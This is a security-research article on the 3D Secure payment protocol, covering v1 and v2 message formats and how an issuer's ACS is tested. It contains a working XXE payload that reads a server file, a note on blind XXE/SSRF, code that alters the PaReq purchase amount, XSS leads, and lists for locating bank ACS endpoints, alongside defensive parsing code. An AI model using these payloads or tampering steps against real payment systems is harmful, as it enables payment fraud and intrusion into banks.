3D Secure, or what lies behind the security mechanisms of online payments



E-commerce is one of the largest and fastest-growing sectors, so it attracts the attention of information-security researchers and cybercriminals alike. That is why I want to look into some aspects of the security mechanisms used when making payments online.



In this article I want to look at one of the most widespread of those mechanisms: 3D Secure. It is an XML-based protocol that adds an extra layer of security to card payments where the card is not physically presented (card not present payments). It was originally developed by VISA, later adopted by the other payment systems (Master Card, JCB International, AmEx and others), and VISA eventually handed the specification over to EMVCo. Today it is known as EMV 3DS.



What is 3D Secure?



3D Secure stands for Three Domain Secure, after the three domains the protocol spans.

Issuer domain: the bank that issued the card, and therefore the party that authenticates the cardholder.

Acquirer domain: the bank that serves the merchant and accepts the payment on its behalf.

Interoperability domain: the infrastructure of the payment system (directory servers, certificates and the rules of the scheme) that lets the other two domains talk 3D Secure to each other. The two components that do the actual work are the merchant plug-in (MPI) on the acquirer side and the access control server (ACS) on the issuer side.



Why is it needed?



3D Secure exists to cut card-not-present fraud by making the issuer authenticate the cardholder before the payment is authorized.

Its second, commercial, effect is the so-called «liability shift». Without 3DS, a fraudulent payment ends in a chargeback and the merchant (or its acquirer) carries the loss; with 3DS, responsibility for a transaction the issuer has authenticated moves to the issuer. This is the main reason merchants adopt 3D Secure at all.

In short: the merchant is protected from chargebacks, and the issuer gets an authentication step under its own control.

If the transaction went through 3DS, the issuer pays for the fraud; if it did not, the merchant does.



Versions of 3D Secure



v1.0 - 2001
v2.0 - 2014
v2.1 - 2017
v2.2 - 2018

Version 1.0.2 is the one actually deployed for CNP payments today, and it authenticates the cardholder with a one-time password (OTP).

So 1.0.2 has been in use since 2001.

The current EMV specification is v2.2, and the payment systems planned the migration to it for 2020.



How does it work?

Figure: participants of a 3DS payment.

Let us first look at a payment from the cardholder's side, and then at the messages exchanged behind the scenes.



What does the cardholder see?

From the cardholder's point of view the flow is simple: they enter the card number, expiry date and CVV on the merchant's page, are redirected to a page of the issuing bank (the ACS), confirm the payment there with a 3DS one-time password and are returned to the merchant. Everything else happens behind the scenes.



Figure: payment flow.



Stage 1, "verification". It is performed by the MPI and the cardholder does not see it.

The merchant plug-in (MPI) first asks the directory server of the payment system whether the card's range participates in 3DS at all, with a CRReq (Card Range Request). The CRRes lists the participating ranges; an MPI usually caches it and consults the cache for every new card.

Then the MPI sends a VeReq (Verification Request) with the card number to the directory server, which forwards it to the issuer's ACS: is this particular card enrolled in 3DS?

The answer comes back as a VeRes (Verification Response) with the enrollment status and the URL of the ACS.

Stage 2: the MPI builds a PaReq (Payment Request) with the payment details and hands it to the cardholder's browser, which POSTs it to the ACS URL from the VeRes.

On receiving the PaReq, the ACS shows its page and asks the cardholder for the OTP.

Stage 3: the ACS verifies the OTP, forms a PaRes (Payment Response) and returns it, again through the browser, to the MPI, which checks the ACS signature and the status before sending the transaction for authorization.



What do the messages look like?

I will skip CRReq/CRRes and start with VeReq/VeRes.



<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message id="999">
    <VEReq>
      <version>1.0.2</version>
      <pan>4444333322221111</pan>
      <Merchant>
        <acqBIN>411111</acqBIN>
        <merID>99000001</merID>
        <password>99000001</password>
      </Merchant>
      <Browser>
        <deviceCategory>0</deviceCategory>
        <accept>*/*</accept>
        <userAgent>curl/7.27.0</userAgent>
      </Browser>
    </VEReq>
  </Message>
</ThreeDSecure>


The VeReq carries the protocol version, the card's PAN and the merchant's credentials: the acquirer BIN, the merchant ID and the merchant password.



<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message id="999">
    <VERes>
      <version>1.0.2</version>
      <CH>
        <enrolled>Y</enrolled>
        <acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
      </CH>
      <url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
      <protocol>ThreeDSecure</protocol>
    </VERes>
  </Message>
</ThreeDSecure>


The VeRes carries the same message id as the request, so the MPI can match the response to it. The status enrolled = Y means the card participates in 3DS; acctID is an opaque identifier of the card assigned by the issuer, which later goes into the PaReq instead of the PAN.

And the url: the address of the ACS to which the browser will POST the PaReq.



PaReq



This is the message the cardholder's browser delivers to the ACS. The MPI builds it, wraps it in an HTML form with a bit of JavaScript that submits itself, and the browser POSTs the form to the ACS URL. Since the browser carries it, the cardholder (or whoever controls the browser) sees and can change everything in it. Here is such a PaReq.



URL: https://site.ru/acs/pareq

MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%2Fshop.ru%2Fgates%2F3ds


So the PaReq form (a POST to the ACS) carries three parameters:

1) MD: Merchant Data. An opaque value the MPI uses to match the PaRes to the PaReq it sent, i.e. a session identifier;

2) PaReq: the payment request itself. Encoded, see below;

3) TermUrl: the URL on the merchant's side to which the ACS returns the result of 3D Secure authentication.



The ACS does nothing with TermUrl and MD except put them back into the HTML form that carries the PaRes. In other words, the ACS reflects attacker-controlled values into its own page, so reflected XSS is the first thing to check. Check it.

Observation #1: the ACS does not verify the PaReq!



What is inside the PaReq?

Nothing is encrypted; the PaReq is merely encoded: Xml -> zlib -> base64 -> urlencode. Run the chain backwards in Burp's decoder and you get the XML.



Figure: decoded PaReq.



Inside the decoded PaReq we find the XML with the purchase amount (purchAmount, amount and currency), the Message id (the same one as in the VeReq), the merchant's data and the acctID from the VeRes.
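As an added example (not code from the original article), here is the Xml -> zlib -> base64 -> urlencode chain and its reverse in Python, applied to a constructed PAReq rather than the blob above, together with the comparisons a tester makes after decoding: message id against the VeReq, purchAmount and currency against the real order. The XML, merchant identifiers, xid and acctID are made up for the example.

```python
"""Unwrap and re-wrap a 3DS 1.0.2 PaReq the way the browser carries it to the ACS."""
import base64
import urllib.parse
import xml.etree.ElementTree as ET
import zlib

# Constructed PAReq for the example; merchant, xid and acctID values are dummies.
SAMPLE_PAREQ_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<ThreeDSecure><Message id="999"><PAReq><version>1.0.2</version>'
    '<Merchant><acqBIN>411111</acqBIN><merID>99000001</merID><name>Example Shop</name>'
    '<country>643</country><url>https://shop.example/</url></Merchant>'
    '<Purchase><xid>AAAAAAAAAAAAAAAAAAAAAAAAAAA=</xid><date>20181004 21:34:21</date>'
    '<amount>RUB 2020.00</amount><purchAmount>202000</purchAmount>'
    '<currency>643</currency><exponent>2</exponent></Purchase>'
    '<CH><acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID><expiry>2209</expiry></CH>'
    '</PAReq></Message></ThreeDSecure>'
)


def encode_pareq(xml_text):
    """Xml -> zlib -> base64 -> urlencode: the wrapping the MPI applies to the PaReq form field."""
    compressed = zlib.compress(xml_text.encode("utf-8"))
    return urllib.parse.quote(base64.b64encode(compressed).decode("ascii"), safe="")


def decode_pareq(form_value):
    """The reverse chain, urldecode -> base64 -> zlib -> Xml; what Burp's decoder does by hand."""
    compressed = base64.b64decode(urllib.parse.unquote(form_value))
    return zlib.decompress(compressed).decode("utf-8")


def build_acs_post(md, xml_text, term_url):
    """Body of the auto-submitting form: MD, encoded PaReq and TermUrl."""
    return "MD=%s&PaReq=%s&TermUrl=%s" % (
        urllib.parse.quote(md, safe=""),
        encode_pareq(xml_text),
        urllib.parse.quote(term_url, safe=""),
    )


def split_acs_post(body):
    """Split the MD / PaReq / TermUrl fields. parse_qs percent-decodes, so PaReq comes back as bare base64."""
    fields = urllib.parse.parse_qs(body, strict_parsing=True)
    return {name: values[0] for name, values in fields.items()}


def summarize_pareq(xml_text):
    """Pull out the values worth comparing against the VeReq and against the real order."""
    message = ET.fromstring(xml_text).find("Message")
    purchase = message.find("PAReq/Purchase")
    return {
        "message_id": message.get("id"),
        "mer_id": message.findtext("PAReq/Merchant/merID"),
        "purch_amount": int(purchase.findtext("purchAmount")),
        "currency": purchase.findtext("currency"),
        "exponent": int(purchase.findtext("exponent")),
        "acct_id": message.findtext("PAReq/CH/acctID"),
    }


def with_purch_amount(xml_text, minor_units):
    """The same PaReq with another purchAmount: what Observation #1 allows, since nothing signs the PaReq."""
    root = ET.fromstring(xml_text)
    root.find("Message/PAReq/Purchase/purchAmount").text = str(minor_units)
    return ET.tostring(root, encoding="unicode")


def consistent_with_order(summary, vereq_message_id, order_minor_units, order_currency):
    """The comparisons a tester makes after decoding: message id equals the VeReq's, amount and currency equal the order's."""
    return (
        summary["message_id"] == vereq_message_id
        and summary["purch_amount"] == order_minor_units
        and summary["currency"] == order_currency
    )
```

The round trip shows why Burp is enough here: no key is involved at any stage, so an altered purchAmount re-encodes into a PaReq the ACS cannot tell from the original.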



If we modify the PaReq (any field, the amount for instance), encode it again and submit it, the ACS accepts it and replies with a PaRes, which looks like this:



Figure: decoded PaRes.



As a researcher, the first thing that comes to mind for an XML-based protocol is XXE. Let's check!

But first, a look at how the ACS handles malformed input. Break the PaReq in different ways and the ACS replies with Error messages, for example:



<ThreeDSecure><Message id="poEpShmja0A36YWe0JOyr4Zt"><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>

<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>

<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>

<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>


Each ACS implementation has its own set of error texts, which helps fingerprint the product behind the endpoint. Now to the XXE.



XXE



The payload:



<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id="123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>


acqBIN, merID, xid, date, purchAmount and currency are copied from the PaReq into the PaRes. So the entity reference goes into a field the ACS echoes back, merID, and the result, if the ACS resolved the entity, shows up in the response.

The second option (when nothing is echoed back) is an entity whose SYSTEM identifier is a URL on a server we control: if that server receives a DNS lookup or an HTTP request, the ACS resolves external entities. That is blind XXE.



And here is the result. The ACS resolved the entity and put the content of /proc/sys/kernel/hostname into merID of the PaRes. Note that the message itself was still rejected (iReq 55 pointing at PAReq.CH.acctID), but by then the entity had already been expanded:



<ThreeDSecure><Message id=" 123-123-123-123-123-123 "><PARes id=" 123-123-123-123-123-123 "><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>


With a URL in the entity the ACS can be made to send DNS and HTTP requests to arbitrary hosts, i.e. SSRF. And the billion laughs variant of XXE gives a DoS (not tested here).
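Added example for the ACS side (again not code from the article or from any vendor's ACS): a guard that refuses any PAReq carrying a DOCTYPE or entity declaration before the document reaches the real parser, which stops both the file:// exfiltration payload above and the billion laughs variant in one place. The inputs are constructed copies of those payloads (the hostname path is the one from the article). Python's stdlib xml.etree parser does not fetch external entities on its own, but an ACS built on a parser that does, as the one in the article evidently was, needs exactly this kind of pre-check.

```python
"""Guard an ACS-side XML parser against XXE and billion-laughs PAReq payloads."""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when a PAReq carries a DOCTYPE or an entity declaration."""


# Constructed inputs for the example.
CLEAN_PAREQ = (
    b'<?xml version="1.0" encoding="UTF-8"?><ThreeDSecure><Message id="123"><PAReq>'
    b'<version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>99000001</merID>'
    b'</Merchant><Purchase><purchAmount>202000</purchAmount><currency>643</currency>'
    b'</Purchase></PAReq></Message></ThreeDSecure>'
)
# Same shape as the article's payload: external entity in a field the ACS echoes back.
XXE_PAREQ = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]>'
    b'<ThreeDSecure><Message id="123"><PAReq><version>1.0.2</version>'
    b'<Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID></Merchant></PAReq></Message></ThreeDSecure>'
)
# Deliberately tiny billion-laughs shape (2 levels, 10x each): exercises the guard, harmless if expanded.
LAUGHS_PAREQ = (
    b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
    + b'<!ENTITY lol1 "' + b'&lol;' * 10 + b'">'
    + b'<!ENTITY lol2 "' + b'&lol1;' * 10 + b'">]>'
    + b'<ThreeDSecure><Message id="1"><PAReq><Merchant><merID>&lol2;</merID>'
    + b'</Merchant></PAReq></Message></ThreeDSecure>'
)


def reject_dtd(xml_bytes):
    """First pass with bare expat: abort on the first DOCTYPE or entity declaration, before anything is expanded.
    Returns normally for clean input, raises UnsafeXMLError otherwise (ExpatError for non-XML)."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXMLError("DOCTYPE is not allowed in a PAReq (root %r, SYSTEM %r)" % (name, system_id))

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        raise UnsafeXMLError("entity declaration %r is not allowed" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)


def guard_reason(xml_bytes):
    """Why the guard rejected the document, or an empty string if it passed."""
    try:
        reject_dtd(xml_bytes)
    except (UnsafeXMLError, xml.parsers.expat.ExpatError) as exc:
        return str(exc)
    return ""


def is_safe(xml_bytes):
    return guard_reason(xml_bytes) == ""


def safe_parse_pareq(xml_bytes):
    """Parse only after the guard passed; returns the PAReq element."""
    reject_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    pareq = root.find("Message/PAReq")
    if pareq is None:
        raise ValueError("document is not a PAReq")
    return pareq
```

Refusing the DTD outright is the right policy for a protocol whose messages never legitimately declare one: the 3DS 1.0.2 messages are plain elements, so any DOCTYPE in a PAReq is hostile by definition, and rejecting it at the declaration means no entity, internal or external, is ever expanded.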



Where to look for an ACS?



Typical URL paths:



/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do


Typical words in host names:



acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card


Combine them with the domains of the bank you are interested in.

And the simplest way: pay with your own card with a proxy interceptor running and see where the PaReq goes.



3D Secure v2.*



Everything above applies to 3DS v1.0.

It has well-known drawbacks: a redirect to a bank page that looks nothing like the merchant, a flow that is awkward in mobile apps, an SMS OTP as the only way to confirm, and so on; the ACS page is outside the merchant's control altogether.



Figure: devices supported by 3DS 2.



3DS 2.0 supports payments from mobile applications through the 3DS SDK.

The SDK (and, in a browser, the so-called 3DS Method) collects data about the device and the session: IP address, user agent, screen parameters, time zone and so on, and passes them to the issuer before the cardholder is asked anything.

That lets the issuer decide whether to bother the cardholder at all. In 3DS 1 the OTP was mandatory; in v2 authentication has several types and may be skipped entirely.



Figure: authentication types.



v1.0 knew only the OTP. Now there are one-time passwords, confirmation in the bank's own app (out-of-band) and more!



What is new in 3D Secure v2?



Figure: 3DS 2 components.



Let's go through the differences.

The main one is the Risk Engine. In 1.0.2 the cardholder was always asked for an OTP; in 2.* the issuer first scores the transaction and challenges the cardholder only when the risk warrants it.



The v2 flow



Figure: 3DS 2 flow.



The participants are the same as in v1, but 2.* adds a Risk Engine on the issuer's side (within or next to the ACS) that feeds on the data collected from the browser (3DS Method) or from the app (3DS SDK). On the merchant side the MPI's role is now played by the 3DS Server.

The messages of 2.* are JSON rather than XML and have new names: AReq/ARes for authentication, CReq/CRes for the challenge and RReq/RRes for the result.



What do they look like?



Figure: 3DS 2 AReq.



The AReq (shown base64url-encoded) is sent server-to-server by the 3DS Server and carries the purchase data plus everything that was collected about the cardholder's device.

Look at how much the AReq tells the issuer about the cardholder: browser IP address, user agent, language, screen size, time zone. All of it is input for the risk score.

Based on the AReq the Risk Engine decides: let the transaction through silently (frictionless flow) or challenge the cardholder, for example with an OTP.



What does the challenge look like?



CReq (base64url json), the challenge request, is built from the values of the ARes when the issuer has chosen the Challenge Flow, and is posted by the browser to the ACS.



{
"ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
"AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
"MessageType": "CReq",
"MessageVersion": "2.1.0",
"SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
"SdkCounterStoA": "001"
}


When the 3D Secure SDK is used, the CReq is additionally encrypted (JWE).
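Added example (not from the article): decoding the base64url CReq and the checks an ACS should make before rendering a challenge for it, in particular that the transaction identifiers are the ones this ACS issued in its own ARes, so a CReq cannot be forged from scratch or replayed against another transaction. Field names follow the sample above (the EMV specification spells them in lowerCamelCase); the accepted MessageVersion set and the "expected ARes identifiers" passed in are assumptions for the example.

```python
"""Decode a base64url CReq and check it against the ARes it claims to continue."""
import base64
import json
import uuid

# The sample CReq from the article; field names follow that sample.
SAMPLE_CREQ = {
    "ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
    "AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
    "MessageType": "CReq",
    "MessageVersion": "2.1.0",
    "SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
    "SdkCounterStoA": "001",
}

# Versions this example ACS accepts (assumption for the example).
SUPPORTED_VERSIONS = ("2.1.0", "2.2.0")


def creq_encode(message):
    """JSON -> base64url without padding, the form the browser posts in the creq field."""
    raw = json.dumps(message, separators=(",", ":")).encode("utf-8")
    return base64.urlsafe_b64encode(raw).decode("ascii").rstrip("=")


def creq_decode(token):
    """Restore the stripped padding, then base64url -> JSON."""
    padded = token + "=" * (-len(token) % 4)
    return json.loads(base64.urlsafe_b64decode(padded.encode("ascii")).decode("utf-8"))


def _is_uuid(value):
    try:
        uuid.UUID(str(value))
    except ValueError:
        return False
    return True


def validate_creq(creq, ares_trans_ids):
    """ares_trans_ids: (ThreeDSServerTransID, AcsTransID) this ACS handed out in its own ARes.
    Returns a list of problems; an empty list means the challenge may be rendered."""
    problems = []
    if creq.get("MessageType") != "CReq":
        problems.append("MessageType is %r, expected CReq" % creq.get("MessageType"))
    if creq.get("MessageVersion") not in SUPPORTED_VERSIONS:
        problems.append("unsupported MessageVersion %r" % creq.get("MessageVersion"))
    for key in ("ThreeDSServerTransID", "AcsTransID"):
        if not _is_uuid(creq.get(key)):
            problems.append("%s is not a UUID" % key)
    # The binding that stops forgery/replay: the IDs must be the pair issued in the ARes.
    if (creq.get("ThreeDSServerTransID"), creq.get("AcsTransID")) != tuple(ares_trans_ids):
        problems.append("transaction IDs do not match the ARes this ACS issued")
    if "SdkTransID" in creq:  # app-based flow: SDK identifiers and counter are present
        if not _is_uuid(creq["SdkTransID"]):
            problems.append("SdkTransID is not a UUID")
        counter = creq.get("SdkCounterStoA", "")
        if not (len(counter) == 3 and counter.isdigit()):
            problems.append("SdkCounterStoA must be three digits, got %r" % counter)
    return problems
```

The transaction-ID check is the one that matters: every other field can be well-formed in a CReq an attacker assembled themselves, but the AcsTransID is generated by the ACS and is only ever seen by the 3DS Server that received the ARes.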



Main CReq parameters:



Figure: CReq parameters.



So in 2.* the 3DS messages are JSON, and the XML-specific attack surface is gone. The challenge page is still HTML rendered by the ACS from request data, though, so XSS is still worth looking for.





Summary (what to look for)



v1



  • XXE in the PaReq:

    • DoS
    • SSRF
  • XSS via TermUrl
  • Blind XSS
  • The PaReq is not verified! The amount the ACS shows the cardholder can be changed, e.g. to display 1 while the order is for 100.


v2



  • Blind XSS
  • Challenge flow, …


Finally: most banks do not write their own ACS but buy one from a handful of vendors or use 3DS as SaaS. So a bug found in one vendor's product is, in practice, a bug in many banks at once.





Links:

https://github.com/w3c/webpayments/wiki

https://www.EMV.com/emv-technologies/3d-secure/

https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html

https://github.com/webr0ck/3D-Secure-audit-cheatsheet



P.S. I am often asked: "On AliExpress, Amazon and the like no OTP is requested. Is 3DS used there at all?"



